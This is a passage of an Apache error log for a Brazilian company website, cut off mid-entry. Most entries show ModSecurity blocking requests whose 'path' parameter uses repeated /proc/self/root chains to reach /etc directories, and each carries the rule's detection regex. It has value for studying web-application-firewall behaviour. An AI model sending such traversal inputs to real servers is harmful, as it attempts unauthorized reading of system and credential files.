[Thu Mar 19 06:17:57.044823 2026] [:error] [pid 17887:tid 140411616036608] [client 74.7.244.43:35912] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abu_RQkwaGbbGflqUZCUWgAAAM8"]
[Thu Mar 19 06:18:03.149866 2026] [proxy_fcgi:error] [pid 26799:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:38820] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 06:18:21.849816 2026] [:error] [pid 14269:tid 140411624429312] [client 74.7.243.128:47204] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/logrotate.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abu_XQbLMZ6AikZjR9U4twAAAA4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 06:18:29.130302 2026] [proxy_fcgi:error] [pid 31803:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:39412] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 06:18:35.962556 2026] [:error] [pid 15826:tid 140411658000128] [client 74.7.243.128:33194] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/locaweb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abu_a-oXxyEfFpUF8f_ryAAAAUo"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 06:18:56.069870 2026] [proxy_fcgi:error] [pid 19093:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:40080] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 06:19:17.415531 2026] [:error] [pid 31803:tid 140411649607424] [client 74.7.243.128:51204] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/tmpfiles.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abu_leyqAr6etmhZHNo_pwAAAEs"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 06:19:20.130116 2026] [proxy_fcgi:error] [pid 30077:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:40756] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 06:19:25.170733 2026] [:error] [pid 27293:tid 140411632822016] [client 74.7.243.128:39386] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abu_nP-YZRR_7pZ7nDJpWwAAA80"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 06:19:42.531848 2026] [:error] [pid 17887:tid 140411699963648] [client 74.7.243.128:47112] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/dovecot"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abu_rgkwaGbbGflqUZCUiAAAAMU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 06:19:42.837781 2026] [proxy_fcgi:error] [pid 17887:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:41330] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 06:19:52.107647 2026] [:error] [pid 26799:tid 140411741927168] [client 74.7.243.128:40604] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/rsyslog.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abu_uNa6ubjKNq_cu4YhuAAAA0A"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 06:19:56.564665 2026] [:error] [pid 31803:tid 140411616036608] [client 74.7.243.128:47440] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/lldpd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abu_vOyqAr6etmhZHNo_tgAAAE8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 06:20:06.149787 2026] [proxy_fcgi:error] [pid 15826:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:41870] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 06:20:31.137827 2026] [proxy_fcgi:error] [pid 19093:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:42438] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 06:20:54.046009 2026] [proxy_fcgi:error] [pid 31803:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:43064] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 06:21:16.107846 2026] [proxy_fcgi:error] [pid 17653:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:43702] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 06:21:29.352984 2026] [:error] [pid 31803:tid 140411674785536] [client 74.7.243.128:59522] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abvAGeyqAr6etmhZHNo_5QAAAEg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 06:21:32.857294 2026] [:error] [pid 15826:tid 140411674785536] [client 74.7.243.128:53578] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/gnupg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abvAHOoXxyEfFpUF8f_sPAAAAUg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 06:21:39.125330 2026] [proxy_fcgi:error] [pid 27403:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:44250] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 06:21:48.347157 2026] [:error] [pid 17887:tid 140411683178240] [client 74.7.243.128:53588] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/cron.hourly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abvALAkwaGbbGflqUZCU3QAAAMc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 06:22:03.433810 2026] [proxy_fcgi:error] [pid 31803:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:44888] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 06:22:09.467058 2026] [:error] [pid 17887:tid 140411725141760] [client 74.7.243.128:45084] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abvAQQkwaGbbGflqUZCU_gAAAMI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 06:22:15.888987 2026] [:error] [pid 30077:tid 140411557287680] [client 74.7.243.128:34208] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abvAR_u8EFLIOrSqIpt8qwAAAlY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 06:22:27.125407 2026] [proxy_fcgi:error] [pid 26799:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:45622] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 06:22:48.129823 2026] [proxy_fcgi:error] [pid 30077:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:46220] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 06:23:11.138198 2026] [proxy_fcgi:error] [pid 17653:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:46872] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 06:23:35.073814 2026] [proxy_fcgi:error] [pid 27403:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:47438] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 06:23:35.225104 2026] [:error] [pid 26799:tid 140411607643904] [client 74.7.243.128:34220] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abvAl9a6ubjKNq_cu4YitwAAA1A"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 06:23:39.055303 2026] [:error] [pid 30077:tid 140411641214720] [client 74.7.243.128:50350] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abvAm_u8EFLIOrSqIpt81wAAAkw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 06:23:44.739882 2026] [:error] [pid 14269:tid 140411540502272] [client 74.7.243.128:55222] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abvAoAbLMZ6AikZjR9U5bgAAABg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 06:23:47.304791 2026] [:error] [pid 17653:tid 140411708356352] [client 74.7.243.128:55234] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abvAo8df6f5d65gmYZRQnwAAAsQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 06:23:54.371909 2026] [:error] [pid 17653:tid 140411733534464] [client 74.7.243.128:58812] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abvAqsdf6f5d65gmYZRQqwAAAsE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 06:24:01.125816 2026] [proxy_fcgi:error] [pid 15826:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:48190] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 06:24:05.182346 2026] [:error] [pid 17887:tid 140411716749056] [client 74.7.243.128:58820] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/rwtab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abvAtQkwaGbbGflqUZCVYQAAAMM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 06:24:07.879206 2026] [:error] [pid 27403:tid 140411582465792] [client 74.7.243.128:59584] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id 